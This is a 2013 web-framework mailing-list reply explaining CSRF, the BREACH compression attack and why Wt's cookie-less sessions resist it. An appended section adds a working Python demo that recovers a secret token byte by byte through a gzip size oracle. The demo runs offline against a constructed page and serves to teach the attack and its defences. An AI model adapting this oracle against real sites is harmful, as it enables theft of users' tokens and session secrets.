Hey Chris,

2013/8/19 Chris Frey <cdf...@foursquare.net>:
> On Mon, Aug 19, 2013 at 09:57:14PM +0200, Koen Deforche wrote:
>> Since we do not rely on cookies, there is no need for CSRF tokens. The
>> BREACH attack doesn't really mention very well, IMHO, that it relies
>> on cookies for session tracking in the first place since that's the
>> starting point to trying to guess a secret in the page by generating
>> requests from the user's browser.
>
> Thanks very much for your reply!
>
> Yes, that makes more sense. If I understand correctly, the entire attack
> relies on:
>
> - the CSRF is given to the server via cookie automatically
CSRF = Cross Site Request Forgery; that's already an attack. CSRF attacks a
target site from the user's browser (which is also visiting the attacker's
site) by abusing the cookie that is used to trust requests from the browser,
and thus generates malicious requests from within the user's browser to the
site under attack. The CSRF token is the primary defense for this attack,
since it puts a token in the response that must be included in "sensitive"
requests in the form submitted from client to server (i.e. requests that
modify data, POST); however, GET requests are usually not protected and
provide this CSRF token in their body. This, together with user-modifiable
output in the response of the GET request, is the basis for BREACH, or at
least in the scenario where they are after your CSRF token. But they can
also attempt to obtain other interesting information such as a name, bank
account number, etc., which is in the GET body.

> In Wt's case, there is generally no cookie value at all, and if the
> attacker guesses a different ID via URL, then it just starts a new
> session and that new ID comes back in the HTML.
>
> Is that close?

That's close. It's even the case that Wt will ignore the session ID (or
refuse the request, I forget now what we actually do) if you would put it
in a URL for a page refresh. This is a second defense in Wt to make even a
stolen session ID useless. Again, this is all under the assumption of an
Ajax session.

Regards,
koen
_______________________________________________
witty-interest mailing list
witty-interest@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/witty-interest
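The two ingredients Koen names above, attacker-controlled text reflected into a GET response and a secret (the CSRF token) sitting in that same response, are exactly what a BREACH-style compression oracle needs. The following is an added example, not code from this thread or from Wt, that simulates the oracle offline: a constructed HTML page echoes a "search" string into its title and carries a hypothetical token 3f9a1c7b2e in a logout link; the attacker reflects a known prefix plus one guessed character and watches the gzip body size. The guess that extends the LZ77 back-reference compresses one byte smaller. To keep that difference deterministic the example forces zlib's fixed Huffman codes (Z_FIXED); real servers use dynamic Huffman codes, which add noise the published attack has to work around with padding and repeated requests, and that noise is deliberately out of scope here.

```python
import zlib

# Constructed sample data for the demonstration (hypothetical, not from Wt):
# the secret token the server embeds in a GET response, its alphabet, and the
# text that immediately precedes it in the page (the attacker's "bootstrap").
SECRET_TOKEN = "3f9a1c7b2e"
TOKEN_ALPHABET = "0123456789abcdef"
PREFIX = "csrf="


def render_page(reflected: str) -> bytes:
    """Constructed GET response: it echoes an attacker-controlled query
    parameter (the search string in <title>) and also carries the secret
    token in a same-page link, i.e. user-modifiable output plus a secret in
    one compressed response."""
    return (
        "<!doctype html>\n"
        f"<html><head><title>Search: {reflected}</title></head>\n"
        "<body>\n"
        "<h1>Results</h1>\n"
        "<p>No results.</p>\n"
        f"<a href='/logout?{PREFIX}{SECRET_TOKEN}'>Log out</a>\n"
        "</body></html>\n"
    ).encode("ascii")


def compressed_size(page: bytes) -> int:
    """Size of the gzip body an attacker can observe on the wire.
    Z_FIXED (assumption made for determinism) forces static Huffman codes, so
    the only thing that changes the size is the LZ77 match length."""
    comp = zlib.compressobj(level=6, wbits=zlib.MAX_WBITS | 16,
                            strategy=getattr(zlib, "Z_FIXED", 4))
    return len(comp.compress(page) + comp.flush())


def oracle_size(known: str, guess: str) -> int:
    """One attacker-triggered request: reflect the last five characters of
    prefix+known plus one guessed character. Keeping the reflected window
    short keeps every LZ77 match in the 3..10 length range, where DEFLATE's
    length codes all cost the same number of bits, so a right guess saves
    exactly one 8-bit literal."""
    window = (PREFIX + known)[-5:] + guess
    return compressed_size(render_page(window))


def recover_token(max_len: int = 32) -> str:
    """Byte-at-a-time recovery: the guess that extends the back-reference is
    the only one whose page compresses smaller. Stops when no guess is
    uniquely smallest, which is what happens one character past the end of
    the token (every guess then ties)."""
    known = ""
    while len(known) < max_len:
        sizes = {c: oracle_size(known, c) for c in TOKEN_ALPHABET}
        smallest = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == smallest]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    for guess in ("3", "4"):
        print(f"reflect {PREFIX + guess!r}: {oracle_size('', guess)} bytes")
    print("recovered:", recover_token())
```

The defenses discussed in the thread map directly onto this loop: with no reflected attacker input there is no back-reference to extend, and with no secret the attacker wants (Wt's session ID is useless to a cross-site attacker, and there is no cookie-backed CSRF token to steal) the oracle has nothing to recover.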